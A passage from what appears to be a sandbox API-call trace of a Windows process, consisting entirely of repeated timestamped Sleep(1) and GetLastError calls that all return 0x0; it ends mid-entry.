[0250.159] Sleep (dwMilliseconds=0x1) [0250.172] GetLastError () returned 0x0 [0250.172] Sleep (dwMilliseconds=0x1) [0250.187] GetLastError () returned 0x0 [0250.187] Sleep (dwMilliseconds=0x1) [0250.203] GetLastError () returned 0x0 [0250.203] Sleep (dwMilliseconds=0x1) [0250.219] GetLastError () returned 0x0 [0250.219] Sleep (dwMilliseconds=0x1) [0250.234] GetLastError () returned 0x0 [0250.234] Sleep (dwMilliseconds=0x1) [0250.250] GetLastError () returned 0x0 [0250.250] Sleep (dwMilliseconds=0x1) [0250.266] GetLastError () returned 0x0 [0250.266] Sleep (dwMilliseconds=0x1) [0250.281] GetLastError () returned 0x0 [0250.281] Sleep (dwMilliseconds=0x1) [0250.297] GetLastError () returned 0x0 [0250.297] Sleep (dwMilliseconds=0x1) [0250.312] GetLastError () returned 0x0 [0250.312] Sleep (dwMilliseconds=0x1) [0250.328] GetLastError () returned 0x0 [0250.328] Sleep (dwMilliseconds=0x1) [0250.343] GetLastError () returned 0x0 [0250.343] Sleep (dwMilliseconds=0x1) [0250.359] GetLastError () returned 0x0 [0250.359] Sleep (dwMilliseconds=0x1) [0250.376] GetLastError () returned 0x0 [0250.376] Sleep (dwMilliseconds=0x1) [0250.390] GetLastError () returned 0x0 [0250.390] Sleep (dwMilliseconds=0x1) [0250.406] GetLastError () returned 0x0 [0250.406] Sleep (dwMilliseconds=0x1) [0250.421] GetLastError () returned 0x0 [0250.421] Sleep (dwMilliseconds=0x1) [0250.437] GetLastError () returned 0x0 [0250.437] Sleep (dwMilliseconds=0x1) [0250.452] GetLastError () returned 0x0 [0250.452] Sleep (dwMilliseconds=0x1) [0250.468] GetLastError () returned 0x0 [0250.468] Sleep (dwMilliseconds=0x1) [0250.484] GetLastError () returned 0x0 [0250.484] Sleep (dwMilliseconds=0x1) [0250.499] GetLastError () returned 0x0 [0250.499] Sleep (dwMilliseconds=0x1) [0250.516] GetLastError () returned 0x0 [0250.516] Sleep (dwMilliseconds=0x1) [0250.531] GetLastError () returned 0x0 [0250.531] Sleep (dwMilliseconds=0x1) [0250.546] GetLastError () returned 0x0 [0250.546] Sleep (dwMilliseconds=0x1) [0250.562] GetLastError () returned 0x0 [0250.562] Sleep (dwMilliseconds=0x1) [0250.577] GetLastError () returned 0x0 [0250.577] Sleep (dwMilliseconds=0x1) [0250.593] GetLastError () returned 0x0 [0250.593] Sleep (dwMilliseconds=0x1) [0250.608] GetLastError () returned 0x0 [0250.608] Sleep (dwMilliseconds=0x1) [0250.624] GetLastError () returned 0x0 [0250.624] Sleep (dwMilliseconds=0x1) [0250.640] GetLastError () returned 0x0 [0250.640] Sleep (dwMilliseconds=0x1) [0250.655] GetLastError () returned 0x0 [0250.655] Sleep (dwMilliseconds=0x1) [0250.671] GetLastError () returned 0x0 [0250.671] Sleep (dwMilliseconds=0x1) [0250.687] GetLastError () returned 0x0 [0250.687] Sleep (dwMilliseconds=0x1) [0250.702] GetLastError () returned 0x0 [0250.702] Sleep (dwMilliseconds=0x1) [0250.718] GetLastError () returned 0x0 [0250.718] Sleep (dwMilliseconds=0x1) [0250.733] GetLastError () returned 0x0 [0250.733] Sleep (dwMilliseconds=0x1) [0250.749] GetLastError () returned 0x0 [0250.749] Sleep (dwMilliseconds=0x1) [0250.772] GetLastError () returned 0x0 [0250.772] Sleep (dwMilliseconds=0x1) [0250.780] GetLastError () returned 0x0 [0250.780] Sleep (dwMilliseconds=0x1) [0250.796] GetLastError () returned 0x0 [0250.796] Sleep (dwMilliseconds=0x1) [0250.812] GetLastError () returned 0x0 [0250.812] Sleep (dwMilliseconds=0x1) [0250.827] GetLastError () returned 0x0 [0250.827] Sleep (dwMilliseconds=0x1) [0250.843] GetLastError () returned 0x0 [0250.843] Sleep (dwMilliseconds=0x1) [0250.858] GetLastError () returned 0x0 [0250.858] Sleep (dwMilliseconds=0x1) [0250.874] GetLastError () returned 0x0 [0250.874] Sleep (dwMilliseconds=0x1) [0250.889] GetLastError () returned 0x0 [0250.889] Sleep (dwMilliseconds=0x1) [0250.905] GetLastError () returned 0x0 [0250.905] Sleep (dwMilliseconds=0x1) [0250.921] GetLastError () returned 0x0 [0250.921] Sleep (dwMilliseconds=0x1) [0250.936] GetLastError () returned 0x0 [0250.936] Sleep (dwMilliseconds=0x1) [0250.952] GetLastError () returned 0x0 [0250.952] Sleep (dwMilliseconds=0x1) [0250.968] GetLastError () returned 0x0 [0250.968] Sleep (dwMilliseconds=0x1) [0250.983] GetLastError () returned 0x0 [0250.983] Sleep (dwMilliseconds=0x1) [0250.999] GetLastError () returned 0x0 [0250.999] Sleep (dwMilliseconds=0x1) [0251.017] GetLastError () returned 0x0 [0251.017] Sleep (dwMilliseconds=0x1) [0251.030] GetLastError () returned 0x0 [0251.030] Sleep (dwMilliseconds=0x1) [0251.046] GetLastError () returned 0x0 [0251.046] Sleep (dwMilliseconds=0x1) [0251.061] GetLastError () returned 0x0 [0251.061] Sleep (dwMilliseconds=0x1) [0251.077] GetLastError () returned 0x0 [0251.077] Sleep (dwMilliseconds=0x1) [0251.092] GetLastError () returned 0x0 [0251.092] Sleep (dwMilliseconds=0x1) [0251.108] GetLastError () returned 0x0 [0251.108] Sleep (dwMilliseconds=0x1) [0251.123] GetLastError () returned 0x0 [0251.123] Sleep (dwMilliseconds=0x1) [0251.139] GetLastError () returned 0x0 [0251.139] Sleep (dwMilliseconds=0x1) [0251.174] GetLastError () returned 0x0 [0251.174] Sleep (dwMilliseconds=0x1) [0251.186] GetLastError () returned 0x0 [0251.186] Sleep (dwMilliseconds=0x1) [0251.201] GetLastError () returned 0x0 [0251.201] Sleep (dwMilliseconds=0x1) [0251.217] GetLastError () returned 0x0 [0251.217] Sleep (dwMilliseconds=0x1) [0251.233] GetLastError () returned 0x0 [0251.233] Sleep (dwMilliseconds=0x1) [0251.248] GetLastError () returned 0x0 [0251.248] Sleep (dwMilliseconds=0x1) [0251.264] GetLastError () returned 0x0 [0251.264] Sleep (dwMilliseconds=0x1) [0251.279] GetLastError () returned 0x0 [0251.279] Sleep (dwMilliseconds=0x1) [0251.295] GetLastError () returned 0x0 [0251.295] Sleep (dwMilliseconds=0x1) [0251.311] GetLastError () returned 0x0 [0251.311] Sleep (dwMilliseconds=0x1) [0251.326] GetLastError () returned 0x0 [0251.326] Sleep (dwMilliseconds=0x1) [0251.342] GetLastError () returned 0x0 [0251.342] Sleep (dwMilliseconds=0x1) [0251.358] GetLastError () returned 0x0 [0251.358] Sleep (dwMilliseconds=0x1) [0251.373] GetLastError () returned 0x0 [0251.373] Sleep (dwMilliseconds=0x1) [0251.388] GetLastError () returned 0x0 [0251.389] Sleep (dwMilliseconds=0x1) [0251.404] GetLastError () returned 0x0 [0251.404] Sleep (dwMilliseconds=0x1) [0251.420] GetLastError () returned 0x0 [0251.420] Sleep (dwMilliseconds=0x1) [0251.435] GetLastError () returned 0x0 [0251.436] Sleep (dwMilliseconds=0x1) [0251.451] GetLastError () returned 0x0 [0251.451] Sleep (dwMilliseconds=0x1) [0251.467] GetLastError () returned 0x0 [0251.467] Sleep (dwMilliseconds=0x1) [0251.482] GetLastError () returned 0x0 [0251.482] Sleep (dwMilliseconds=0x1) [0251.498] GetLastError () returned 0x0 [0251.498] Sleep (dwMilliseconds=0x1) [0251.513] GetLastError () returned 0x0 [0251.513] Sleep (dwMilliseconds=0x1) [0251.529] GetLastError () returned 0x0 [0251.529] Sleep (dwMilliseconds=0x1) [0251.551] GetLastError () returned 0x0 [0251.551] Sleep (dwMilliseconds=0x1) [0251.561] GetLastError () returned 0x0 [0251.562] Sleep (dwMilliseconds=0x1) [0251.577] GetLastError () returned 0x0 [0251.577] Sleep (dwMilliseconds=0x1) [0251.591] GetLastError () returned 0x0 [0251.591] Sleep (dwMilliseconds=0x1) [0251.607] GetLastError () returned 0x0 [0251.607] Sleep (dwMilliseconds=0x1) [0251.623] GetLastError () returned 0x0 [0251.623] Sleep (dwMilliseconds=0x1) [0251.638] GetLastError () returned 0x0 [0251.638] Sleep (dwMilliseconds=0x1) [0251.654] GetLastError () returned 0x0 [0251.654] Sleep (dwMilliseconds=0x1) [0251.669] GetLastError () returned 0x0 [0251.669] Sleep (dwMilliseconds=0x1) [0251.685] GetLastError () returned 0x0 [0251.685] Sleep (dwMilliseconds=0x1) [0251.701] GetLastError () returned 0x0 [0251.701] Sleep (dwMilliseconds=0x1) [0251.716] GetLastError () returned 0x0 [0251.716] Sleep (dwMilliseconds=0x1) [0251.732] GetLastError () returned 0x0 [0251.732] Sleep (dwMilliseconds=0x1) [0251.747] GetLastError () returned 0x0 [0251.747] Sleep (dwMilliseconds=0x1) [0251.763] GetLastError () returned 0x0 [0251.763] Sleep (dwMilliseconds=0x1) [0251.786] GetLastError () returned 0x0 [0251.786] Sleep (dwMilliseconds=0x1) [0251.794] GetLastError () returned 0x0 [0251.794] Sleep (dwMilliseconds=0x1) [0251.810] GetLastError () returned 0x0 [0251.810] Sleep (dwMilliseconds=0x1) [0251.825] GetLastError () returned 0x0 [0251.825] Sleep (dwMilliseconds=0x1) [0251.841] GetLastError () returned 0x0 [0251.841] Sleep (dwMilliseconds=0x1) [0251.862] GetLastError () returned 0x0 [0251.862] Sleep (dwMilliseconds=0x1) [0251.872] GetLastError () returned 0x0 [0251.872] Sleep (dwMilliseconds=0x1) [0251.889] GetLastError () returned 0x0 [0251.889] Sleep (dwMilliseconds=0x1) [0251.903] GetLastError () returned 0x0 [0251.904] Sleep (dwMilliseconds=0x1) [0251.919] GetLastError () returned 0x0 [0251.919] Sleep (dwMilliseconds=0x1) [0251.935] GetLastError () returned 0x0 [0251.935] Sleep (dwMilliseconds=0x1) [0251.950] GetLastError () returned 0x0 [0251.950] Sleep (dwMilliseconds=0x1) [0251.966] GetLastError () returned 0x0 [0251.966] Sleep (dwMilliseconds=0x1) [0251.982] GetLastError () returned 0x0 [0251.982] Sleep (dwMilliseconds=0x1) [0251.997] GetLastError () returned 0x0 [0251.997] Sleep (dwMilliseconds=0x1) [0252.013] GetLastError () returned 0x0 [0252.013] Sleep (dwMilliseconds=0x1) [0252.029] GetLastError () returned 0x0 [0252.030] Sleep (dwMilliseconds=0x1) [0252.044] GetLastError () returned 0x0 [0252.044] Sleep (dwMilliseconds=0x1) [0252.061] GetLastError () returned 0x0 [0252.061] Sleep (dwMilliseconds=0x1) [0252.075] GetLastError () returned 0x0 [0252.075] Sleep (dwMilliseconds=0x1) [0252.093] GetLastError () returned 0x0 [0252.093] Sleep (dwMilliseconds=0x1) [0252.106] GetLastError () returned 0x0 [0252.106] Sleep (dwMilliseconds=0x1) [0252.122] GetLastError () returned 0x0 [0252.122] Sleep (dwMilliseconds=0x1) [0252.137] GetLastError () returned 0x0 [0252.137] Sleep (dwMilliseconds=0x1) [0252.172] GetLastError () returned 0x0 [0252.172] Sleep (dwMilliseconds=0x1) [0252.184] GetLastError () returned 0x0 [0252.184] Sleep (dwMilliseconds=0x1) [0252.201] GetLastError () returned 0x0 [0252.201] Sleep (dwMilliseconds=0x1) [0252.216] GetLastError () returned 0x0 [0252.216] Sleep (dwMilliseconds=0x1) [0252.231] GetLastError () returned 0x0 [0252.231] Sleep (dwMilliseconds=0x1) [0252.247] GetLastError () returned 0x0 [0252.247] Sleep (dwMilliseconds=0x1) [0252.262] GetLastError () returned 0x0 [0252.262] Sleep (dwMilliseconds=0x1) [0252.278] GetLastError () returned 0x0 [0252.278] Sleep (dwMilliseconds=0x1) [0252.294] GetLastError () returned 0x0 [0252.294] Sleep (dwMilliseconds=0x1) [0252.309] GetLastError () returned 0x0 [0252.310] Sleep (dwMilliseconds=0x1) [0252.325] GetLastError () returned 0x0 [0252.325] Sleep (dwMilliseconds=0x1) [0252.340] GetLastError () returned 0x0 [0252.341] Sleep (dwMilliseconds=0x1) [0252.360] GetLastError () returned 0x0 [0252.361] Sleep (dwMilliseconds=0x1) [0252.383] GetLastError () returned 0x0 [0252.383] Sleep (dwMilliseconds=0x1) [0252.388] GetLastError () returned 0x0 [0252.388] Sleep (dwMilliseconds=0x1) [0252.403] GetLastError () returned 0x0 [0252.403] Sleep (dwMilliseconds=0x1) [0252.418] GetLastError () returned 0x0 [0252.418] Sleep (dwMilliseconds=0x1) [0252.434] GetLastError () returned 0x0 [0252.434] Sleep (dwMilliseconds=0x1) [0252.449] GetLastError () returned 0x0 [0252.449] Sleep (dwMilliseconds=0x1) [0252.465] GetLastError () returned 0x0 [0252.465] Sleep (dwMilliseconds=0x1) [0252.481] GetLastError () returned 0x0 [0252.481] Sleep (dwMilliseconds=0x1) [0252.496] GetLastError () returned 0x0 [0252.496] Sleep (dwMilliseconds=0x1) [0252.513] GetLastError () returned 0x0 [0252.513] Sleep (dwMilliseconds=0x1) [0252.527] GetLastError () returned 0x0 [0252.527] Sleep (dwMilliseconds=0x1) [0252.543] GetLastError () returned 0x0 [0252.543] Sleep (dwMilliseconds=0x1) [0252.559] GetLastError () returned 0x0 [0252.559] Sleep (dwMilliseconds=0x1) [0252.574] GetLastError () returned 0x0 [0252.574] Sleep (dwMilliseconds=0x1) [0252.590] GetLastError () returned 0x0 [0252.590] Sleep (dwMilliseconds=0x1) [0252.605] GetLastError () returned 0x0 [0252.605] Sleep (dwMilliseconds=0x1) [0252.621] GetLastError () returned 0x0 [0252.621] Sleep (dwMilliseconds=0x1) [0252.637] GetLastError () returned 0x0 [0252.637] Sleep (dwMilliseconds=0x1) [0252.652] GetLastError () returned 0x0 [0252.652] Sleep (dwMilliseconds=0x1) [0252.668] GetLastError () returned 0x0 [0252.668] Sleep (dwMilliseconds=0x1) [0252.683] GetLastError () returned 0x0 [0252.683] Sleep (dwMilliseconds=0x1) [0252.699] GetLastError () returned 0x0 [0252.699] Sleep (dwMilliseconds=0x1) [0252.715] GetLastError () returned 0x0 [0252.715] Sleep (dwMilliseconds=0x1) [0252.730] GetLastError () returned 0x0 [0252.730] Sleep (dwMilliseconds=0x1) [0252.746] GetLastError () returned 0x0 [0252.746] Sleep (dwMilliseconds=0x1) [0252.762] GetLastError () returned 0x0 [0252.762] Sleep (dwMilliseconds=0x1) [0252.777] GetLastError () returned 0x0 [0252.777] Sleep (dwMilliseconds=0x1) [0252.802] GetLastError () returned 0x0 [0252.802] Sleep (dwMilliseconds=0x1) [0252.808] GetLastError () returned 0x0 [0252.808] Sleep (dwMilliseconds=0x1) [0252.824] GetLastError () returned 0x0 [0252.824] Sleep (dwMilliseconds=0x1) [0252.840] GetLastError () returned 0x0 [0252.840] Sleep (dwMilliseconds=0x1) [0252.855] GetLastError () returned 0x0 [0252.855] Sleep (dwMilliseconds=0x1) [0252.871] GetLastError () returned 0x0 [0252.871] Sleep (dwMilliseconds=0x1) [0252.886] GetLastError () returned 0x0 [0252.886] Sleep (dwMilliseconds=0x1) [0252.903] GetLastError () returned 0x0 [0252.903] Sleep (dwMilliseconds=0x1) [0252.918] GetLastError () returned 0x0 [0252.918] Sleep (dwMilliseconds=0x1) [0252.933] GetLastError () returned 0x0 [0252.933] Sleep (dwMilliseconds=0x1) [0252.949] GetLastError () returned 0x0 [0252.949] Sleep (dwMilliseconds=0x1) [0252.964] GetLastError () returned 0x0 [0252.965] Sleep (dwMilliseconds=0x1) [0252.980] GetLastError () returned 0x0 [0252.980] Sleep (dwMilliseconds=0x1) [0252.996] GetLastError () returned 0x0 [0252.996] Sleep (dwMilliseconds=0x1) [0253.011] GetLastError () returned 0x0 [0253.011] Sleep (dwMilliseconds=0x1) [0253.026] GetLastError () returned 0x0 [0253.027] Sleep (dwMilliseconds=0x1) [0253.042] GetLastError () returned 0x0 [0253.042] Sleep (dwMilliseconds=0x1) [0253.058] GetLastError () returned 0x0 [0253.058] Sleep (dwMilliseconds=0x1) [0253.074] GetLastError () returned 0x0 [0253.074] Sleep (dwMilliseconds=0x1) [0253.089] GetLastError () returned 0x0 [0253.089] Sleep (dwMilliseconds=0x1) [0253.105] GetLastError () returned 0x0 [0253.105] Sleep (dwMilliseconds=0x1) [0253.120] GetLastError () returned 0x0 [0253.120] Sleep (dwMilliseconds=0x1) [0253.136] GetLastError () returned 0x0 [0253.136] Sleep (dwMilliseconds=0x1) [0253.178] GetLastError () returned 0x0 [0253.178] Sleep (dwMilliseconds=0x1) [0253.182] GetLastError () returned 0x0 [0253.182] Sleep (dwMilliseconds=0x1) [0253.198] GetLastError () returned 0x0 [0253.198] Sleep (dwMilliseconds=0x1) [0253.214] GetLastError () returned 0x0 [0253.214] Sleep (dwMilliseconds=0x1) [0253.230] GetLastError () returned 0x0 [0253.230] Sleep (dwMilliseconds=0x1) [0253.245] GetLastError () returned 0x0 [0253.245] Sleep (dwMilliseconds=0x1) [0253.260] GetLastError () returned 0x0 [0253.261] Sleep (dwMilliseconds=0x1) [0253.276] GetLastError () returned 0x0 [0253.276] Sleep (dwMilliseconds=0x1) [0253.292] GetLastError () returned 0x0 [0253.292] Sleep (dwMilliseconds=0x1) [0253.308] GetLastError () returned 0x0 [0253.308] Sleep (dwMilliseconds=0x1) [0253.323] GetLastError () returned 0x0 [0253.323] Sleep (dwMilliseconds=0x1) [0253.339] GetLastError () returned 0x0 [0253.339] Sleep (dwMilliseconds=0x1) [0253.354] GetLastError () returned 0x0 [0253.354] Sleep (dwMilliseconds=0x1) [0253.370] GetLastError () returned 0x0 [0253.370] Sleep (dwMilliseconds=0x1) [0253.385] GetLastError () returned 0x0 [0253.385] Sleep (dwMilliseconds=0x1) [0253.401] GetLastError () returned 0x0 [0253.401] Sleep (dwMilliseconds=0x1) [0253.417] GetLastError () returned 0x0 [0253.417] Sleep (dwMilliseconds=0x1) [0253.432] GetLastError () returned 0x0 [0253.433] Sleep (dwMilliseconds=0x1) [0253.448] GetLastError () returned 0x0 [0253.448] Sleep (dwMilliseconds=0x1) [0253.463] GetLastError () returned 0x0 [0253.463] Sleep (dwMilliseconds=0x1) [0253.479] GetLastError () returned 0x0 [0253.479] Sleep (dwMilliseconds=0x1) [0253.495] GetLastError () returned 0x0 [0253.495] Sleep (dwMilliseconds=0x1) [0253.510] GetLastError () returned 0x0 [0253.510] Sleep (dwMilliseconds=0x1) [0253.526] GetLastError () returned 0x0 [0253.526] Sleep (dwMilliseconds=0x1) [0253.546] GetLastError () returned 0x0 [0253.546] Sleep (dwMilliseconds=0x1) [0253.557] GetLastError () returned 0x0 [0253.557] Sleep (dwMilliseconds=0x1) [0253.573] GetLastError () returned 0x0 [0253.573] Sleep (dwMilliseconds=0x1) [0253.588] GetLastError () returned 0x0 [0253.589] Sleep (dwMilliseconds=0x1) [0253.604] GetLastError () returned 0x0 [0253.604] Sleep (dwMilliseconds=0x1) [0253.621] GetLastError () returned 0x0 [0253.621] Sleep (dwMilliseconds=0x1) [0253.635] GetLastError () returned 0x0 [0253.635] Sleep (dwMilliseconds=0x1) [0253.651] GetLastError () returned 0x0 [0253.651] Sleep (dwMilliseconds=0x1) [0253.666] GetLastError () returned 0x0 [0253.666] Sleep (dwMilliseconds=0x1) [0253.682] GetLastError () returned 0x0 [0253.682] Sleep (dwMilliseconds=0x1) [0253.697] GetLastError () returned 0x0 [0253.697] Sleep (dwMilliseconds=0x1) [0253.713] GetLastError () returned 0x0 [0253.713] Sleep (dwMilliseconds=0x1) [0253.733] GetLastError () returned 0x0 [0253.733] Sleep (dwMilliseconds=0x1) [0253.744] GetLastError () returned 0x0 [0253.744] Sleep (dwMilliseconds=0x1) [0253.760] GetLastError () returned 0x0 [0253.760] Sleep (dwMilliseconds=0x1) [0253.775] GetLastError () returned 0x0 [0253.775] Sleep (dwMilliseconds=0x1) [0253.800] GetLastError () returned 0x0 [0253.801] Sleep (dwMilliseconds=0x1) [0253.807] GetLastError () returned 0x0 [0253.807] Sleep (dwMilliseconds=0x1) [0253.822] GetLastError () returned 0x0 [0253.822] Sleep (dwMilliseconds=0x1) [0253.838] GetLastError () returned 0x0 [0253.838] Sleep (dwMilliseconds=0x1) [0253.853] GetLastError () returned 0x0 [0253.854] Sleep (dwMilliseconds=0x1) [0253.870] GetLastError () returned 0x0 [0253.871] Sleep (dwMilliseconds=0x1) [0253.885] GetLastError () returned 0x0 [0253.885] Sleep (dwMilliseconds=0x1) [0253.900] GetLastError () returned 0x0 [0253.900] Sleep (dwMilliseconds=0x1) [0253.916] GetLastError () returned 0x0 [0253.916] Sleep (dwMilliseconds=0x1) [0253.931] GetLastError () returned 0x0 [0253.931] Sleep (dwMilliseconds=0x1) [0253.947] GetLastError () returned 0x0 [0253.947] Sleep (dwMilliseconds=0x1) [0253.963] GetLastError () returned 0x0 [0253.963] Sleep (dwMilliseconds=0x1) [0253.978] GetLastError () returned 0x0 [0253.978] Sleep (dwMilliseconds=0x1) [0253.994] GetLastError () returned 0x0 [0253.994] Sleep (dwMilliseconds=0x1) [0254.009] GetLastError () returned 0x0 [0254.009] Sleep (dwMilliseconds=0x1) [0254.025] GetLastError () returned 0x0 [0254.025] Sleep (dwMilliseconds=0x1) [0254.041] GetLastError () returned 0x0 [0254.041] Sleep (dwMilliseconds=0x1) [0254.056] GetLastError () returned 0x0 [0254.056] Sleep (dwMilliseconds=0x1) [0254.072] GetLastError () returned 0x0 [0254.072] Sleep (dwMilliseconds=0x1) [0254.088] GetLastError () returned 0x0 [0254.088] Sleep (dwMilliseconds=0x1) [0254.103] GetLastError () returned 0x0 [0254.103] Sleep (dwMilliseconds=0x1) [0254.119] GetLastError () returned 0x0 [0254.119] Sleep (dwMilliseconds=0x1) [0254.136] GetLastError () returned 0x0 [0254.136] Sleep (dwMilliseconds=0x1) [0254.169] GetLastError () returned 0x0 [0254.169] Sleep (dwMilliseconds=0x1) [0254.183] GetLastError () returned 0x0 [0254.183] Sleep (dwMilliseconds=0x1) [0254.197] GetLastError () returned 0x0 [0254.197] Sleep (dwMilliseconds=0x1) [0254.212] GetLastError () returned 0x0 [0254.212] Sleep (dwMilliseconds=0x1) [0254.228] GetLastError () returned 0x0 [0254.228] Sleep (dwMilliseconds=0x1) [0254.243] GetLastError () returned 0x0 [0254.243] Sleep (dwMilliseconds=0x1) [0254.259] GetLastError () returned 0x0 [0254.259] Sleep (dwMilliseconds=0x1) [0254.275] GetLastError () returned 0x0 [0254.275] Sleep (dwMilliseconds=0x1) [0254.290] GetLastError () returned 0x0 [0254.290] Sleep (dwMilliseconds=0x1) [0254.306] GetLastError () returned 0x0 [0254.306] Sleep (dwMilliseconds=0x1) [0254.321] GetLastError () returned 0x0 [0254.321] Sleep (dwMilliseconds=0x1) [0254.338] GetLastError () returned 0x0 [0254.338] Sleep (dwMilliseconds=0x1) [0254.354] GetLastError () returned 0x0 [0254.354] Sleep (dwMilliseconds=0x1) [0254.368] GetLastError () returned 0x0 [0254.368] Sleep (dwMilliseconds=0x1) [0254.384] GetLastError () returned 0x0 [0254.384] Sleep (dwMilliseconds=0x1) [0254.400] GetLastError () returned 0x0 [0254.400] Sleep (dwMilliseconds=0x1) [0254.417] GetLastError () returned 0x0 [0254.417] Sleep (dwMilliseconds=0x1) [0254.431] GetLastError () returned 0x0 [0254.431] Sleep (dwMilliseconds=0x1) [0254.446] GetLastError () returned 0x0 [0254.446] Sleep (dwMilliseconds=0x1) [0254.462] GetLastError () returned 0x0 [0254.462] Sleep (dwMilliseconds=0x1) [0254.477] GetLastError () returned 0x0 [0254.477] Sleep (dwMilliseconds=0x1) [0254.493] GetLastError () returned 0x0 [0254.493] Sleep (dwMilliseconds=0x1) [0254.509] GetLastError () returned 0x0 [0254.509] Sleep (dwMilliseconds=0x1) [0254.524] GetLastError () returned 0x0 [0254.524] Sleep (dwMilliseconds=0x1) [0254.540] GetLastError () returned 0x0 [0254.540] Sleep (dwMilliseconds=0x1) [0254.555] GetLastError () returned 0x0 [0254.555] Sleep (dwMilliseconds=0x1) [0254.571] GetLastError () returned 0x0 [0254.571] Sleep (dwMilliseconds=0x1) [0254.587] GetLastError () returned 0x0 [0254.587] Sleep (dwMilliseconds=0x1) [0254.602] GetLastError () returned 0x0 [0254.602] Sleep (dwMilliseconds=0x1) [0254.618] GetLastError () returned 0x0 [0254.618] Sleep (dwMilliseconds=0x1) [0254.633] GetLastError () returned 0x0 [0254.634] Sleep (dwMilliseconds=0x1) [0254.649] GetLastError () returned 0x0 [0254.649] Sleep (dwMilliseconds=0x1) [0254.665] GetLastError () returned 0x0 [0254.665] Sleep (dwMilliseconds=0x1) [0254.680] GetLastError () returned 0x0 [0254.680] Sleep (dwMilliseconds=0x1) [0254.696] GetLastError () returned 0x0 [0254.696] Sleep (dwMilliseconds=0x1) [0254.711] GetLastError () returned 0x0 [0254.711] Sleep (dwMilliseconds=0x1) [0254.728] GetLastError () returned 0x0 [0254.728] Sleep (dwMilliseconds=0x1) [0254.743] GetLastError () returned 0x0 [0254.743] Sleep (dwMilliseconds=0x1) [0254.758] GetLastError () returned 0x0 [0254.758] Sleep (dwMilliseconds=0x1) [0254.774] GetLastError () returned 0x0 [0254.774] Sleep (dwMilliseconds=0x1) [0254.789] GetLastError () returned 0x0 [0254.790] Sleep (dwMilliseconds=0x1) [0254.812] GetLastError () returned 0x0 [0254.812] Sleep (dwMilliseconds=0x1) [0254.820] GetLastError () returned 0x0 [0254.821] Sleep (dwMilliseconds=0x1) [0254.836] GetLastError () returned 0x0 [0254.836] Sleep (dwMilliseconds=0x1) [0254.852] GetLastError () returned 0x0 [0254.852] Sleep (dwMilliseconds=0x1) [0254.867] GetLastError () returned 0x0 [0254.867] Sleep (dwMilliseconds=0x1) [0254.883] GetLastError () returned 0x0 [0254.883] Sleep (dwMilliseconds=0x1) [0254.899] GetLastError () returned 0x0 [0254.899] Sleep (dwMilliseconds=0x1) [0254.914] GetLastError () returned 0x0 [0254.914] Sleep (dwMilliseconds=0x1) [0254.930] GetLastError () returned 0x0 [0254.930] Sleep (dwMilliseconds=0x1) [0254.946] GetLastError () returned 0x0 [0254.946] Sleep (dwMilliseconds=0x1) [0254.961] GetLastError () returned 0x0 [0254.961] Sleep (dwMilliseconds=0x1) [0254.977] GetLastError () returned 0x0 [0254.977] Sleep (dwMilliseconds=0x1) [0254.992] GetLastError () returned 0x0 [0254.992] Sleep (dwMilliseconds=0x1) [0255.008] GetLastError () returned 0x0 [0255.008] Sleep (dwMilliseconds=0x1) [0255.024] GetLastError () returned 0x0 [0255.024] Sleep (dwMilliseconds=0x1) [0255.039] GetLastError () returned 0x0 [0255.039] Sleep (dwMilliseconds=0x1) [0255.055] GetLastError () returned 0x0 [0255.055] Sleep (dwMilliseconds=0x1) [0255.070] GetLastError () returned 0x0 [0255.070] Sleep (dwMilliseconds=0x1) [0255.086] GetLastError () returned 0x0 [0255.086] Sleep (dwMilliseconds=0x1) [0255.102] GetLastError () returned 0x0 [0255.102] Sleep (dwMilliseconds=0x1) [0255.118] GetLastError () returned 0x0 [0255.119] Sleep (dwMilliseconds=0x1) [0255.133] GetLastError () returned 0x0 [0255.133] Sleep (dwMilliseconds=0x1) [0255.166] GetLastError () returned 0x0 [0255.166] Sleep (dwMilliseconds=0x1) [0255.180] GetLastError () returned 0x0 [0255.180] Sleep (dwMilliseconds=0x1) [0255.195] GetLastError () returned 0x0 [0255.195] Sleep (dwMilliseconds=0x1) [0255.211] GetLastError () returned 0x0 [0255.211] Sleep (dwMilliseconds=0x1) [0255.226] GetLastError () returned 0x0 [0255.226] Sleep (dwMilliseconds=0x1) [0255.242] GetLastError () returned 0x0 [0255.242] Sleep (dwMilliseconds=0x1) [0255.257] GetLastError () returned 0x0 [0255.257] Sleep (dwMilliseconds=0x1) [0255.273] GetLastError () returned 0x0 [0255.273] Sleep (dwMilliseconds=0x1) [0255.289] GetLastError () returned 0x0 [0255.289] Sleep (dwMilliseconds=0x1) [0255.304] GetLastError () returned 0x0 [0255.304] Sleep (dwMilliseconds=0x1) [0255.320] GetLastError () returned 0x0 [0255.320] Sleep (dwMilliseconds=0x1) [0255.335] GetLastError () returned 0x0 [0255.335] Sleep (dwMilliseconds=0x1) [0255.351] GetLastError () returned 0x0 [0255.351] Sleep (dwMilliseconds=0x1) [0255.367] GetLastError () returned 0x0 [0255.367] Sleep (dwMilliseconds=0x1) [0255.382] GetLastError () returned 0x0 [0255.382] Sleep (dwMilliseconds=0x1) [0255.398] GetLastError () returned 0x0 [0255.398] Sleep (dwMilliseconds=0x1) [0255.413] GetLastError () returned 0x0 [0255.413] Sleep (dwMilliseconds=0x1) [0255.429] GetLastError () returned 0x0 [0255.429] Sleep (dwMilliseconds=0x1) [0255.445] GetLastError () returned 0x0 [0255.445] Sleep (dwMilliseconds=0x1) [0255.460] GetLastError () returned 0x0 [0255.460] Sleep (dwMilliseconds=0x1) [0255.476] GetLastError () returned 0x0 [0255.476] Sleep (dwMilliseconds=0x1) [0255.492] GetLastError () returned 0x0 [0255.492] Sleep (dwMilliseconds=0x1) [0255.509] GetLastError () returned 0x0 [0255.509] Sleep (dwMilliseconds=0x1) [0255.523] GetLastError () returned 0x0 [0255.523] Sleep (dwMilliseconds=0x1) [0255.538] GetLastError () returned 0x0 [0255.538] Sleep (dwMilliseconds=0x1) [0255.554] GetLastError () returned 0x0 [0255.554] Sleep (dwMilliseconds=0x1) [0255.569] GetLastError () returned 0x0 [0255.569] Sleep (dwMilliseconds=0x1) [0255.585] GetLastError () returned 0x0 [0255.586] Sleep (dwMilliseconds=0x1) [0255.601] GetLastError () returned 0x0 [0255.601] Sleep (dwMilliseconds=0x1) [0255.616] GetLastError () returned 0x0 [0255.616] Sleep (dwMilliseconds=0x1) [0255.632] GetLastError () returned 0x0 [0255.632] Sleep (dwMilliseconds=0x1) [0255.647] GetLastError () returned 0x0 [0255.647] Sleep (dwMilliseconds=0x1) [0255.663] GetLastError () returned 0x0 [0255.663] Sleep (dwMilliseconds=0x1) [0255.679] GetLastError 